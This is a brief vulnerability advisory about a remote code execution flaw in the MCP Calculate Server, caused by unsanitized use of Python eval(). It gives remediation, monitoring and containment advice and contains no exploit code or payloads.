A critical remote code execution vulnerability in the MCP Calculate Server allows unauthenticated attackers to execute arbitrary commands via malicious mathematical expressions.

The application utilizes the Python eval() function to process user-supplied input without sanitization; an unauthenticated attacker can inject arbitrary code into the calculation service.

The ability to execute arbitrary code on the host system poses a critical risk of total system compromise, data theft, and lateral movement within the network. The CVSS score of 9.8 reflects the high probability and impact of such an exploit.

Immediate Action: Update the MCP Calculate Server to version 0.1.1 or later to remove the unsafe use of eval().

Proactive Monitoring: Monitor system process logs for unexpected child processes spawned by the calculation service.

Compensating Controls: Run the calculation service within a highly restricted, containerized environment with minimal privileges and no egress network access.

Public Exploit Available: false

This vulnerability represents an immediate threat to system integrity. Organizations utilizing the MCP Calculate Server must apply the 0.1.1 update as a matter of urgency to prevent remote code execution.